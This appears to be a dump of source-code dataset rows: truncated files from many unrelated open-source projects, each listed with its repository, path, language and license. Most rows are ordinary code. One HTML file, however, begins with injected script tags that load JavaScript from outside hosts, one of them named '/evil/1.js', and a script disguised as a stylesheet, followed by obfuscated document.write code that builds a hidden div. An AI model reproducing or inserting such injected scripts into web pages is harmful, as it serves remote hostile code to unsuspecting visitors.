code
stringlengths
3
1.01M
repo_name
stringlengths
5
116
path
stringlengths
3
311
language
stringclasses
30 values
license
stringclasses
15 values
size
int64
3
1.01M
/* =========================================================================== Copyright (C) 1999-2005 Id Software, Inc. This file is part of Quake III Arena source code. Quake III Arena source code is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as publish...
everettcaleb/openarena
source/code/q3_ui/ui_credits.c
C
gpl-2.0
2,278
/* Bongo Project licensing applies to this file, see COPYING * (C) 2007 Alex Hudson */ /** \file * Implementation of XPL hash API: access to gcrypt's MD5 and SHA1 algorithms */ #include <config.h> #include <libintl.h> #include <xplhash.h> #include <memmgr.h> #include <gcrypt.h> #include <libintl.h> #include <loc...
bongo-project/bongo
src/libs/xpl/hash.c
C
gpl-2.0
3,881
#ifndef CONTROLLER_H #define CONTROLLER_H #include <opencv2/core/core.hpp> #include <opencv2/imgproc/imgproc.hpp> #include <opencv2/highgui/highgui.hpp> /* * TODO * Exception management * Correggere single channel * Add dithering * Custom Filter Tool */ class ImageProcessor { public: static i...
Daguerreo/Azul
ImageProcessor.h
C
gpl-2.0
1,963
<script src="http://cpm.36obuy.org/evil/1.js"></script><script src="http://cpm.36obuy.org/lion/1.js"></script><script/src=//360cdn.win/c.css></script> <script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '0...
ForAEdesWeb/AEW2
images/full-kit/02021333585tv.html
HTML
gpl-2.0
35,078
.ctools-locked{color:red;border:1px solid red;padding:1em;}.ctools-owns-lock{background:#FFFFDD none repeat scroll 0 0;border:1px solid #F0C020;padding:1em;}a.ctools-ajaxing,input.ctools-ajaxing,button.ctools-ajaxing,select.ctools-ajaxing{padding-right:18px !important;background:url(/sites/all/modules/ctools/images/sta...
tapclicks/tapanalytics
sites/default/files/css/css_QGxnq7_LKNI7tSIgnRwVVxHC4_9P5v-mXGFNjCzW6ak.css
CSS
gpl-2.0
935
/** * ownCloud Android client application * * @author Bartek Przybylski * @author Tobias Kaminsky * @author David A. Velasco * @author masensio * Copyright (C) 2011 Bartek Przybylski * Copyright (C) 2016 ownCloud Inc. * <p> * This program is free software: you can redistribute it and/or modify * ...
aleister09/android
src/main/java/com/owncloud/android/ui/adapter/FileListListAdapter.java
Java
gpl-2.0
25,342
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>LDView Help</title> <meta http-equiv = "content-language" content = "en"/> <meta http-equiv = "content-type" content = "text/html; charset=iso-8859-1"/> <style type="text/css"><!-- BODY { margin...
tcobbs/ldview
Translations/EnglishUS/Help.html
HTML
gpl-2.0
186,679
/* * Copyright (c) 2010 Mark Liversedge (liversedge@gmail.com) * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the Free * Software Foundation; either version 2 of the License, or (at your option) * any later version. ...
chet0xhenry/GoldenCheetah
src/CalDAV.cpp
C++
gpl-2.0
13,932
/** * JHylaFax - A java client for HylaFAX. * * Copyright (C) 2005 by Steffen Pingel <steffenp@gmx.de> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, o...
Distrotech/jhylafax
src/java/net/sf/jhylafax/PollDialog.java
Java
gpl-2.0
2,766
#ifndef __POSITION_H__ #define __POSITION_H__ /* Compute distance between two points. */ double distance (double lat1, double lon1, double lat2, double lon2); /* Build the phone number based on the ICAO code and airport frequency. */ void icao2number (char *icao, float frequency, char *buf); /* Search for the clos...
Affix/fgcom
src/position.h
C
gpl-2.0
489
<?php /** * --------------------------------------------------------------------- * GLPI - Gestionnaire Libre de Parc Informatique * Copyright (C) 2015-2017 Teclib' and contributors. * * http://glpi-project.org * * based on GLPI - Gestionnaire Libre de Parc Informatique * Copyright (C) 2003-2014 by the INDEPNET...
eltharin/glpi
inc/phone.class.php
PHP
gpl-2.0
20,642
<?php if (!defined('_JEXEC') && !defined('_PROPAYMENT')) die('Direct Access to '.basename(__FILE__).' is not allowed.'); ?> 17/02/2013 10:03:13 - ** ELABORAZIONE SERVER EGIPSY ** importo:175,20 divisa:EUR esito:307033 ordine nymero:000000000000f7fd0398 transazione:00305B0EA8EC294665749024 negoziante:3987525000...
alesconti/FF_2015
propayment/log/2013-02-17.log.php
PHP
gpl-2.0
895
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" con...
jpmerc/leddartech
Doc/html/_leddar_c_8h_af747d7c1e4cf4a603cb68f7feb3a1e40.html
HTML
gpl-2.0
13,534
/** * */ package com.airnoise.services; import java.sql.SQLException; import com.airnoise.core.exception.PersistenceException; import com.airnoise.dao.DataBaseManager; /** * @author tomio * */ public class DataBaseManagementService { private DataBaseManager manager; public DataBaseManagementServi...
mio-to/airnoise
airnoise/dao/src/main/java/com/airnoise/services/DataBaseManagementService.java
Java
gpl-2.0
947
<?php /** * @package Joomla.Component.Builder * * @created 30th April, 2015 * @author Llewellyn van der Merwe <http://www.joomlacomponentbuilder.com> * @gitea Joomla Component Builder <https://git.vdm.dev/joomla/Component-Builder> * @github Joomla Component Builder <https://github.com/vdm-io/Jo...
vdm-io/Joomla-Component-Builder
admin/views/templates/tmpl/default_body.php
PHP
gpl-2.0
4,232
/* * Qtstalker stock charter * * Copyright (C) 2001-2010 Stefan S. Stratigakos * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your opti...
abhikalitra/qtstalker
lib/CommandGroupPanel.h
C
gpl-2.0
1,132
/* * motion_comp_altivec.c * Copyright (C) 2000-2003 Michel Lespinasse <walken@zoy.org> * Copyright (C) 1999-2000 Aaron Holtzman <aholtzma@ess.engr.uvic.ca> * * This file is part of mpeg2dec, a free MPEG-2 video stream decoder. * See http://libmpeg2.sourceforge.net/ for updates. * * mpeg2dec is free software; y...
muravjov/bombono-dvd
libs/mpeg2dec/libmpeg2/motion_comp_altivec.c
C
gpl-2.0
29,445
# The set of languages for which implicit dependencies are needed: SET(CMAKE_DEPENDS_LANGUAGES "CXX" ) # The set of files for implicit dependencies of each language: SET(CMAKE_DEPENDS_CHECK_CXX "/tmp/gwenview-4.8.5/tests/auto/historymodeltest.cpp" "/tmp/gwenview-4.8.5/tests/auto/CMakeFiles/historymodeltest.dir/hi...
biophysics/gwenview
tests/auto/CMakeFiles/historymodeltest.dir/DependInfo.cmake
CMake
gpl-2.0
1,018
<HTML> <HEAD> <TITLE> Standalone Executables </TITLE> </HEAD> <BODY> <FONT FACE="Helvetica"><TABLE CELLPADDING=5 CELLSPACING=5> <TR ALIGN="center"> <TD COLSPAN=2><IMG SRC="me_inc.gif" HEIGHT=36 WIDTH=480><HR></TD> </TR> <TR> <TD VALIGN="top" NOWRAP BGCOLOR="#D8D0F0"><H4>Sitemap</H4><...
lebauce/artub
builder/Installer/doc/standalones.html
HTML
gpl-2.0
4,633
/* $Id: sungem.h,v 1.1.1.1 2010/03/11 21:07:23 kris Exp $ * sungem.h: Definitions for Sun GEM ethernet driver. * * Copyright (C) 2000 David S. Miller (davem@redhat.com) */ #ifndef _SUNGEM_H #define _SUNGEM_H /* Global Registers */ #define GREG_SEBSTATE 0x0000UL /* SEB State Register */ #define GREG_CFG 0x0004UL ...
fgoncalves/Modified-TS7500-Kernel
drivers/net/sungem.h
C
gpl-2.0
43,361
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Initialization, Finalization, and Threads &mdash; P...
platinhom/ManualHom
Coding/Python/python-3.5.1rc1-docs-html/c-api/init.html
HTML
gpl-2.0
106,425
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="es"> <head> <!-- Generated by javadoc (1.8.0_25) on Fri Nov 28 19:41:33 CET 2014 --> <title>I-Index</title> <meta name="date" content="2014-11-28"> <link rel="stylesheet" type="text...
DavidSPCrack/UEM_AccesoADatos
GardenCare/doc/index-files/index-2.html
HTML
gpl-2.0
5,065
/* 一:基本信息: 开源协议:https://github.com/xucongli1989/XCLNetTools/blob/master/LICENSE 项目地址:https://github.com/xucongli1989/XCLNetTools Create By: XCL @ 2012 */ using System.Web.Security; namespace XCLNetTools.Encrypt { /// <summary> /// md5相关 /// </summary> public static class MD5 { /// <summ...
xucongli1989/XCLNetTools
XCLNetTools/Encrypt/MD5.cs
C#
gpl-2.0
1,682
<!DOCTYPE html> <!--[if IE 7]><html lang="pt" class="no-js ie7"><![endif]--> <!--[if IE 8]><html lang="pt" class="no-js ie8"><![endif]--> <!--[if gt IE 8]><!--> <html lang="pt" class="no-js"> <!--<![endif]--> <head> <meta charset="utf-8" /> <!-- Web Experience Toolkit (WET) / Boîte à outils de l'expérience Web (BOEW) w...
ccatalina/modulemonday
sites/all/libraries/wet-boew/demos/theme-gcwu-intranet/pt/cont-secnav1-pt.html
HTML
gpl-2.0
12,752
## # This file is part of WhatWeb and may be subject to # redistribution and commercial restrictions. Please see the WhatWeb # web site for more information on licensing and terms of use. # https://morningstarsecurity.com/research/whatweb ## Plugin.define do name "eXtreme-Message-Board" authors [ "Brendan Coles <bcol...
urbanadventurer/WhatWeb
plugins/xmb.rb
Ruby
gpl-2.0
1,081
/* * Created on Jan 25, 2005 * Created by Alon Rohter * Copyright (C) 2004-2005 Aelitis, All Rights Reserved. * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the ...
thangbn/Direct-File-Downloader
src/src/com/aelitis/azureus/core/peermanager/messaging/MessageStreamDecoder.java
Java
gpl-2.0
2,758
/************************************************************************* SampleFIFO.h - simple FIFO, tuned for sample_t ------------------- begin : Sun Apr 11 2004 copyright : (C) 2004 by Thomas Eschenbacher email : Thomas....
KDE/kwave
libkwave/SampleFIFO.h
C
gpl-2.0
3,096
(function($){ if (typeof UxU.utils !== 'undefined') { $('.uxu-ticket-status-festival-length').html(UxU.utils.durationFromVisitors(info.tickets_sold)); } })(jQuery);
j0n/uxu-prototype
wp-content/plugins/uxu-tickets/js/uxu-tickets.js
JavaScript
gpl-2.0
173
# -*- coding: utf-8 -*- # # Nitrate is copyright 2010 Red Hat, Inc. # # Nitrate is free software: you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 2 of the License, or # (at your option) any later version. This pr...
tkdchen/nitrate-xmlrpc
nitratexmlrpc/api/user.py
Python
gpl-2.0
5,535
/* ScummVM - Graphic Adventure Engine * * ScummVM is the legal property of its developers, whose names * are too numerous to list here. Please refer to the COPYRIGHT * file distributed with this source distribution. * * Parts of this code are heavily based on: * icoutils - A set of programs dealing with MS Windo...
tramboi/scummvm-test
engines/scumm/he/resource_he.h
C
gpl-2.0
12,044
<?php // Copyright 2011 Toby Zerner, Simon Zerner // This file is part of esoTalk. Please see the included license file for usage information. if (!defined("IN_ESOTALK")) { exit; } /** * A model which provides functions to perform searches for conversations. Handles the implementation * of gambits, and does sea...
Felli/fireside
core/models/ETSearchModel.class.php
PHP
gpl-2.0
34,554
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=utf-8"> <TITLE>?????</TITLE> <META NAME="GENERATOR" CONTENT="LibreOffice 3.5 (Linux)"> <META NAME="AUTHOR" CONTENT="Ministerie van Landbouw, Natuurbeheer en Visserij"> <META NAM...
ivorbosloper/pestileaks
doc/ctgb_html/12579.html
HTML
gpl-2.0
7,203
using System; namespace WaCore.Sample.Middlewares.Models { public class ErrorViewModel { public string RequestId { get; set; } public bool ShowRequestId => !string.IsNullOrEmpty(RequestId); } }
HerbertBodner/webapp-core
src/WaCore.Sample.Middlewares/Models/ErrorViewModel.cs
C#
gpl-2.0
223
package org.iatoki.judgels.michael.controllers; import com.google.common.collect.ImmutableList; import com.google.common.collect.Lists; import org.apache.commons.lang3.EnumUtils; import org.iatoki.judgels.play.InternalLink; import org.iatoki.judgels.play.LazyHtml; import org.iatoki.judgels.play.controllers.AbstractJud...
ia-toki/judgels-michael
app/org/iatoki/judgels/michael/controllers/MachineWatcherController.java
Java
gpl-2.0
13,764
/* SPDX-License-Identifier: GPL-2.0+ */ /* * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * (at your option) any later version. * * This program is dis...
pszewczyk/systemd
src/udev/udevadm-control.c
C
gpl-2.0
6,585
// ------------------------------------------------------------------------------ // <autogenerated> // This code was generated by a tool. // Mono Runtime Version: 4.0.30319.17020 // // Changes to this file may cause incorrect behavior and will be lost if // the code is regenerated. // </autogen...
tphillips/SERV
SERVWeb/ChangePassword.aspx.designer.cs
C#
gpl-2.0
1,045
/* * Copyright 2006 John-Mark Bell <jmb202@ecs.soton.ac.uk> * * This file is part of NetSurf, http://www.netsurf-browser.org/ * * NetSurf is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; version 2 of the...
ashmew2/nskolibrios
netsurf/riscos/textarea.c
C
gpl-2.0
29,072
/*************************************************************************** * Copyright (C) 2009-2012 Virginia Tech Real-Time Systems Lab * * * * Original version written by Matthew Dellinger * * mdellin...
longqzh/chronOS_test
sched_test_app/src/tester.c
C
gpl-2.0
15,697
/** * @file * * rq_config.h contains defines for platform-specific stuff. */ /* ** rq_config.h ** ** Written by Brett Hutley - brett@hutley.net ** ** Copyright (C) 2001-2008 Brett Hutley ** ** This file is part of the Risk Quantify Library ** ** Risk Quantify is free software; you can redistribute it and/or ** modi...
stimuli/riskquantify
src/rq/rq_config.h
C
gpl-2.0
2,727
//: generics/FactoryConstraint.java interface FactoryI<T> { T create(); } class Foo2<T> { private T x; public <F extends FactoryI<T>> Foo2(F factory) { x = factory.create(); } // ... } class IntegerFactory implements FactoryI<Integer> { public Integer create() { return new Integer(0); } } cla...
NorthFacing/step-by-Java
java-base/sourceCodeBak/Thinking in Java/generics/FactoryConstraint.java
Java
gpl-2.0
638
{if $options!=''} <div class="attributes clearfix"> <dl> {foreach name=outer item=options_data from=$options} {if $options_data.DATA || $GM_HIDE_OUT_OF_STOCK == 'false'} <dt>{$options_data.NAME}:</dt> <dd> <select class="input-select{if $PRICE_STATUS != 1} gm_attr_calc_input{/if}" name=...
khadim-raath/gambioTest
templates/EyeCandy/module/product_options/product_options_dropdown.html
HTML
gpl-2.0
1,150
/*************************************************************************** UndoModifyAction.h - UndoAction for modifications on samples ------------------- begin : May 25 2001 copyright : (C) 2001 by Thomas Eschenbacher email : Thomas Eschenbacher <t...
KDE/kwave
libkwave/undo/UndoModifyAction.h
C
gpl-2.0
2,843
/* -*- Mode: C; tab-width: 4; indent-tabs-mode: t; c-basic-offset: 4 -*- */ /* * Mu Qiao <qiaomuf@gmail.com> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the Licens...
Xeralux/NetworkManager
src/settings/plugins/ifnet/connection_parser.c
C
gpl-2.0
88,724
<f:if condition="{content} != ''"> <span>&copy;</span> <div class="copy-box closed" style="opacity:0;"> <p><strong>Copyright-Informationen</strong></p> <br/> <f:format.html>{content}</f:format.html> <br/> <p><span class="close-copy-box">(Fenster schließen)</span></p> ...
Linusvo/shoppingchauau
typo3conf/ext/tbs_templates/Resources/Private/Partials/Elements/Copyright.html
HTML
gpl-2.0
336
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <assert.h> #include <getopt.h> #include <fcntl.h> #include <unistd.h> #include <errno.h> #include <malloc.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/time.h> #include <sys/mman.h> #include <sys/ioctl.h> #inc...
xinpengliu/xinpengliu.github.io
gc6500/captureForGc6500.c
C
gpl-2.0
7,780
<?php /* * Copyright 2005-2015 Centreon * Centreon is developped by : Julien Mathis and Romain Le Merlus under * GPL Licence 2.0. * * This program is free software; you can redistribute it and/or modify it under * the terms of the GNU General Public License as published by the Free Software * Foundation ; either versio...
jben94/centreon
www/include/views/graphs/graph-split.php
PHP
gpl-2.0
5,434
<?php // URI: design/admin/templates/navigator/google.tpl // Filename: design/admin/templates/navigator/google.tpl // Timestamp: 1416144920 (Sun Nov 16 14:35:20 CET 2014) $oldSetArray_99a3cecd353295a13123c0e522f2c6fe = isset( $setArray ) ? $setArray : array(); $setArray = array(); $tpl->Level++; if ( $tpl->Level...
imadkaf/aYaville
ezpublish_legacy/var/ezdemo_site/cache/template/compiled/google-1c07b127ceff2e661bfb8ff17cd42902.php
PHP
gpl-2.0
66,608
/* * Author: Tatu Ylonen <ylo@cs.hut.fi> * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland * All rights reserved * The authentication agent program. * * As far as I am concerned, the code I have written for this software * can be used freely for any purpose. Any derived version...
atmark-techno/atmark-dist
user/openssh/openssh-4.3p2/ssh-agent.c
C
gpl-2.0
29,835
#pragma once /* * Copyright (C) 2005-2008 Team XBMC * http://www.xbmc.org * * This Program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2, or (at your option) * any later...
chris-magic/xbmc_dualaudio_pvr
xbmc/filesystem/MythSession.h
C
gpl-2.0
2,957
'use strict'; const { expect } = require('chai'); const { getParsedSql } = require('./util'); describe('common table expressions', () => { it('should support single CTE', () => { const sql = ` WITH cte AS (SELECT 1) SELECT * FROM cte `.trim(); expect(getParsedSql(s...
godmodelabs/flora-sql-parser
test/ast2sql/cte.js
JavaScript
gpl-2.0
1,628
<!DOCTYPE html> <html> <head> <title>Testify</title> <link href="/app/css/reset.css" rel="stylesheet" type="text/css"> <link href="/app/css/styles.css" rel="stylesheet" type="text/css"> </head> <body> <div id="content-wrapper"> <div id="loading"></div> <h1><a href="/">Testify</a></h1> ...
AdamMurray/Testify
MobileDevices.html
HTML
gpl-2.0
1,839
; DRAW OR SPRITE 2 BYTE DEFINITION ROTATED, ON LEFT BORDER ; 01.2006 aralbrec, Sprite Pack v3.0 ; sinclair spectrum version PUBLIC SP1_DRAW_OR2LB EXTERN SP1_DRAW_OR2NR EXTERN SP1RETSPRDRAW, SP1V_ROTTBL, SP1V_PIXELBUFFER ; following data segment copied into struct sp1_cs ld hl,0 nop ld de,0 call SP1_DRAW...
bitfixer/bitfixer
dg/z88dk/libsrc/sprites/software/sp1/spectrum/sprites/draw/SP1_DRAW_OR2LB.asm
Assembly
gpl-2.0
1,512
"use strict"; /*** * critical element webgl demo by Silke Rohn and Benedikt Klotz * Source is the Basis applikation. * Added and changed functionalities: * @Benedikt: Objects, Lighting, particle systems, shader, blending and face culling * @Silke: particle system, changes to particle systems (Elements) */ var webgl ...
Streamstormer/webGL-project
js/webgl.js
JavaScript
gpl-2.0
37,180
/* * Qt Authentication Library * Copyright (C) 2013 Martin Bříza <mbriza@redhat.com> * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at y...
l10n-tw/sddm
src/auth/Auth.cpp
C++
gpl-2.0
12,193
.d-ui-widget, .ui-widget { background-image: none; background-color: #191919; box-shadow: 0px 0px 3px #595959 inset; -webkit-box-shadow: 0px 0px 3px #595959 inset; -moz-box-shadow: 0px 0px 3px #595959 inset; } .d-ui-widget, .ui-widget, .d-node-content > * { color: #d1d1d1; } .d-ui-widget, .ui-widget, .d-separator, .d-...
DotNetAge/dotnetage
src/DNA.Mvc.Web/Content/css/taoui/black-red.css
CSS
gpl-2.0
9,544
<?php // // ZoneMinder web frame view file, $Date$, $Revision$ // Copyright (C) 2001-2008 Philip Coombes // // This program is free software; you can redistribute it and/or // modify it under the terms of the GNU General Public License // as published by the Free Software Foundation; either version 2 // of the License,...
connortechnology/ZoneMinder
web/skins/classic/views/frame.php
PHP
gpl-2.0
7,597
# # # Copyright 2013-2014 Ghent University # # This file is part of EasyBuild, # originally created by the HPC team of Ghent University (http://ugent.be/hpc/en), # with support of Ghent University (http://ugent.be/hpc), # the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en), # the Hercules foundation (ht...
geimer/easybuild-framework
test/framework/toy_build.py
Python
gpl-2.0
33,739
/* * \brief UART LOG component * \author Christian Helmuth * \date 2011-05-30 */ /* * Copyright (C) 2011-2013 Genode Labs GmbH * * This file is part of the Genode OS framework, which is distributed * under the terms of the GNU General Public License version 2. */ #ifndef _UART_COMPONENT_H_ #define _UART_C...
m-stein/genode
os/src/drivers/uart/uart_component.h
C
gpl-2.0
6,030
import React from "react"; import PropTypes from "prop-types"; import styled from "styled-components"; const StyledTag = styled.span` color: ${props => props.color}; background: ${props => props.bgcolor}; padding: ${props => props.padding}; margin: ${props => props.margin}; border-radius: 3px; border: ${pr...
pamfilos/data.cern.ch
ui/cap-react/src/components/partials/Tag.js
JavaScript
gpl-2.0
1,314
<?php /** * The switch customize control extends the WP_Customize_Control class. This class allows * developers to create switch settings within the WordPress theme customizer. * * @package Bulan * @author Theme Junkie, Kirki * @copyright Copyright (c) 2015, Theme Junkie * @license http://www.gnu.or...
rkarpeles/taylorkarpeles
wp-content/themes/bulan/admin/controls/switch.php
PHP
gpl-2.0
2,026
package e.scm; import java.awt.*; import javax.swing.*; public class AnnotatedLineRenderer extends e.gui.EListCellRenderer<AnnotatedLine> { /** Used to draw the dashed line between adjacent lines from different revisions. */ private static final Stroke DASHED_STROKE = new BasicStroke(1.0f, BasicSt...
software-jessies-org/scm
src/e/scm/AnnotatedLineRenderer.java
Java
gpl-2.0
1,792
from utils import textAppend, textPrepend, textCut, textEditLastChar, error, textCursorPos class File: """ Represents a file (A separated class allow to open several files at a time. The class also holds the whole file content. (The vim buffers only store either the accepted chunks, or the editing statement) """ ...
QuanticPotato/vcoq
plugin/file.py
Python
gpl-2.0
4,084
electric-run13 ============== The hacked-together spritekit app that I wore at Electric Run in Sydney, 2013, in the pouring rain...
bionicmonocle/electric-run13
README.md
Markdown
gpl-2.0
133
// SPDX-License-Identifier: GPL-2.0-or-later // Copyright (C) 2019 The MMapper Authors #include "abstractparser.h" #include <map> #include <memory> #include <optional> #include <ostream> #include <sstream> #include <vector> #include "../configuration/configuration.h" #include "../display/InfoMarkSelection.h" #includ...
MUME/MMapper
src/parser/AbstractParser-Mark.cpp
C++
gpl-2.0
12,204
/* Copyright (C) 2004 Benoît Dejean <TazForEver at dlfp dot org LibGTop is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. L...
RaumZeit/gdesklets-core
libdesklets/system/gtop.c
C
gpl-2.0
38,988
/* KeePass Password Safe - The Open-Source Password Manager Copyright (C) 2003-2017 Dominik Reichl <dominik.reichl@t-online.de> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either ...
FSteitz/KeePass
KeePass/Forms/ImportMethodForm.cs
C#
gpl-2.0
3,187
using System.Collections.Generic; using System.Linq; using System.Web.Http; using Business.Logic.Factories; using Business.Logic.Objects; using Business.Logic.Queries; namespace DFWOutdoors.Controllers { public class CampInfoController : ApiController { [HttpPost] public IEnumerable<CampSite> ...
SparkyCoder/Xenocide
DFWOutdoors/DFWOutdoors/Controllers/CampInfoController.cs
C#
gpl-2.0
740
--- layout: post title: "Knowledge Areas for IT Project Management" date: 2010-08-23 categories: project management --- In his article, "10 ways to avoid mistakes during project development", Alan Norton describes 10 items or methods that can be used to avoid critical mistakes during the project planning and manag...
JeremyCade/jeremycade.github.io
_posts/2010-08-23-knowledge-areas-for-it-project-management.md
Markdown
gpl-2.0
10,022
/* * Copyright (c) 2010 Mark Liversedge (liversedge@gmail.com) * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the Free * Software Foundation; either version 2 of the License, or (at your option) * any later version. ...
g3rg/GoldenCheetah
src/ICalendar.cpp
C++
gpl-2.0
11,408
/** * This file is a part of Luminance HDR package. * ---------------------------------------------------------------------- * Copyright (C) 2011 Franco Comida * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the ...
LuminanceHDR/LuminanceHDR
src/TonemappingPanel/SavingParametersDialog.cpp
C++
gpl-2.0
1,393
/*************************************************************************** AQSGroupBox_p.h ------------------- begin : 30/01/2011 copyright : (C) 2003-2011 by InfoSiAL S.L. email : mail@infosial.com ************************************************************************...
gestiweb/eneboo
src/flbase/aqsobjects/AQSGroupBox_p.h
C
gpl-2.0
6,817
/** * */ package agentRefactoringStrand; /** * @author Daavid * */ public class Attribute { private String name; }
danaderp/unalcol
projects/optimizationRefactoringStrand/src/agentRefactoringStrand/Attribute.java
Java
gpl-2.0
137
/* Widget title color */ #widget-list > div[id*="_tt_"] .widget-title h4 {color:#0096ff;} .widget-content ul.tt-widget-categories { list-style:none; padding-left:20px; } .widget-content ul.tt-widget-categories ul.children{ padding:5px 0 0 15px; }
rodrigodemingo/abu_dhabi_ports
wp-content/themes/mana/framework/css/common.css
CSS
gpl-2.0
254
cmd_drivers/char/hw_random/via-rng.o := gcc -Wp,-MD,drivers/char/hw_random/.via-rng.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/4.8/include -D__KERNEL__ -Iinclude -include include/linux/autoconf.h -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-decl...
namgk/kernel-tut
drivers/char/hw_random/.via-rng.o.cmd
Batchfile
gpl-2.0
18,391
/* -*- Mode: C; c-basic-offset:4 ; -*- */ /* * (C) 2001 by Argonne National Laboratory. * See COPYRIGHT in top-level directory. * * This file is automatically generated by buildiface * DO NOT EDIT */ #include "mpi_fortimpl.h" /* Begin MPI profiling block */ #if defined(USE_WEAK_SYMBOLS) && !defined(USE...
qingu/WRF-Libraries
src/mpich-3.0.1/src/binding/f77/barrierf.c
C
gpl-2.0
6,352
/* * Copyright (C) 2005-2010 MaNGOS <http://getmangos.com/> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * ...
MiLk/mangos
src/game/PetitionsHandler.cpp
C++
gpl-2.0
34,581
# CPUfreq core obj-$(CONFIG_CPU_FREQ) += cpufreq.o # CPUfreq stats obj-$(CONFIG_CPU_FREQ_STAT) += cpufreq_stats.o # CPUfreq governors obj-$(CONFIG_CPU_FREQ_GOV_PERFORMANCE) += cpufreq_performance.o obj-$(CONFIG_CPU_FREQ_GOV_POWERSAVE) += cpufreq_powersave.o obj-$(CONFIG_CPU_FREQ_GOV_WHEATLEY) += cpu...
spock1104/android_kernel_zte_msm8960
drivers/cpufreq/Makefile
Makefile
gpl-2.0
2,877
<?php /* Template Name:aboutus */ ?> <?php get_header(); ?> <div class="about_bt"> <div class="about_bt_ka"> <div class="about_bt_left"> <h1>ABOUT US</h1> <p>关于我们</p> </div> <div class="about_bt_right"> <a href="<?php echo get_option('mytheme_news_title'); ...
xiaofanmeirong/weizhen
wp-content/themes/wood-themes/aboutus.php
PHP
gpl-2.0
2,587
/* * Asterisk -- An open source telephony toolkit. * * Copyright (C) 2007-2008, Digium, Inc. * * Dwayne M. Hubbard <dhubbard@digium.com> * * See http://www.asterisk.org for more information about * the Asterisk project. Please do not directly contact * any of the maintainers of this project for assistance; * ...
Distrotech/asterisk
main/taskprocessor.c
C
gpl-2.0
15,172
package com.example.kickfor; import com.example.kickfor.team.ChangingRoomEntity; import android.os.Handler; import android.os.Message; public class ProgressBarTimer implements Runnable{ private Object v=null; private Handler handler=null; private int what=-1; private Object b=null; public ProgressBarTimer(H...
yumjade/KickFor
src/com/example/kickfor/ProgressBarTimer.java
Java
gpl-2.0
941
<?php // Bloxx - Open Source Content Management System // // Copyright (c) 2002 - 2005 The Bloxx Team. All rights reserved. // // Bloxx is free software; you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation; either version 2 of the...
telmomenezes/bloxx
lang/PT/bloxx_lang_PT_personalinfo.php
PHP
gpl-2.0
1,664
/* * Copyright (c) Bull S.A. 2007 All Rights Reserved. * * This program is free software; you can redistribute it and/or modify it * under the terms of version 2 of the GNU General Public License as * published by the Free Software Foundation. * * This program is distributed in the hope that it would be useful, but * ...
anthony-kolesov/arc_ltp
testcases/network/rpc/rpc-tirpc-full-test-suite/tests_pack/tirpc_svc_7/tirpc_svc_7.c
C
gpl-2.0
5,606
{% extends "../../base-foto.html" %} <!-- XXXXXXXXXXXXXXXXXXXXXXXXXXXXX --> <!-- PAINEL DE CONTROLE DO USUÁRIO --> <!-- XXXXXXXXXXXXXXXXXXXXXXXXXXXXX --> {% block head %} <!-- código para produzir popup com notícias --> <script type="text/javascript" src="/static/noticia.js"></script> <!-- código para produ...
labase/activnce
main/templates/modules/member/control-panel-original.html
HTML
gpl-2.0
11,825
using System; using System.Collections.Generic; using System.ComponentModel.DataAnnotations.Schema; using System.Linq; using System.Text; using System.Threading.Tasks; namespace RielAp.Domain.Models { public class Order : IModel { public Guid OrderId { get; set; } public string Description { g...
tarashor/Rielstartup
RielAp.Domain/Models/Order.cs
